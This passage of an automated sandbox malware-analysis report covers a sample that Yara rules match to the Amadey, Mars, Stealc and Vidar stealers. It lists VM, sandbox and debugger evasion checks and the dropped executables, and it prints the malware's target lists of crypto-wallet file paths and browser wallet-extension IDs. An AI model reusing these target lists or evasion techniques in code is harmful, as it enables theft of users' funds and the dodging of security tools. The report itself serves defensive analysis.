Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.3.dr Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: file.exe, 00000000.00000002.1822925903.0000000001324000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.3.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr Binary or memory string: VMware VMCI Bus Device
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.3.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.3.dr Binary or memory string: vmci.syshbin
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Amcache.hve.3.dr Binary or memory string: VMware, Inc.
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.3.dr Binary or memory string: VMware20,1hbin@
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: xVBoxService.exe
Source: Amcache.hve.3.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.3.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: Amcache.hve.3.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: VBoxService.exe
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: Amcache.hve.3.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: VMWare
Source: Amcache.hve.3.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Code function: 5_2_053E0B7A rdtsc 5_2_053E0B7A
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C655FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C655FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C65C410
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_001C643B mov eax, dword ptr fs:[00000030h] 12_2_001C643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_001CA1A2 mov eax, dword ptr fs:[00000030h] 12_2_001CA1A2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C62B66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C62B1F7
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KJJJJDHIDB.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe "C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62B341 cpuid 0_2_6C62B341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C5F35A0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_00196590 LookupAccountNameA, 12_2_00196590
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.3.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 5.2.JJEGIJEGDB.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.explorti.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.explorti.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorti.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000003.1835353412.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.1883081687.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1923368430.0000000000191000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1915365040.0000000000191000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1883984397.0000000000A11000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1875084748.0000000005230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2284671985.0000000005260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2879009091.0000000000191000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Yara detected Mars stealer
Source: Yara match File source: 0.2.file.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1818332466.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.1822925903.0000000001324000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6436, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.file.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1818332466.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6436, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MetaMask|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|Binance Wallet|fhbohimaelbohpjbbldcngcnapndodjp|1|0|0|Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase Wallet extension|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|0|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|1|0|0|iWallet|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|1|0|0|GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj|1|0|0|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra Station Wallet|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|1|0|0|Auro Wallet(Mina Protocol)|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98 Wallet|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain Wallet|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Brave Wallet|odbfpeeihdkbihmopkbjmoonfanlbfcl|1|0|0|Oxygen|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|Pali Wallet|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|BOLT X|aodkkagnadcbobfpggfnjeongemjbjca|1|0|0|XDEFI Wallet|hmeobnfnfcmdkdcmlblgagmfpfboieaf|1|0|0|Nami|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Maiar DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Keeper Wallet|lpilbniiabackdjcionkobglmddfbcjo|1|0|0|Solflare Wallet|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc|1|0|0|Goby|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|Ronin Wallet|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|Byone|nlgbhdfgdhgbiamfdfmbikcdghidoadd|1|0|0|OneKey|jnmbobjmhlngoefaiojfljckilhhlhcj|1|0|0|DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik|1|0|0|SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmeid|1|0|0|Braavos Wallet|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|kkpllkodjeloidieedojogacfhpaihoh|1|1|1|OKX Wallet|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender Wallet|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|Eternl|kmhcihpebfmpgmihbkipmjlmmioameka|1|0|0|Pontem Aptos Wallet|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Petra Aptos Wallet|ejjladinnckdgjemekebdpeokbikhfci|1|0|0|Martian Aptos Wallet|efbglgofoippbgcjepnhiblaibcnclgk|1|0|0|Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra Wallet|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk|1|0|0|Authenticator|bhghoamapcdpbohphigoooaddinpkbai|1|0|0|
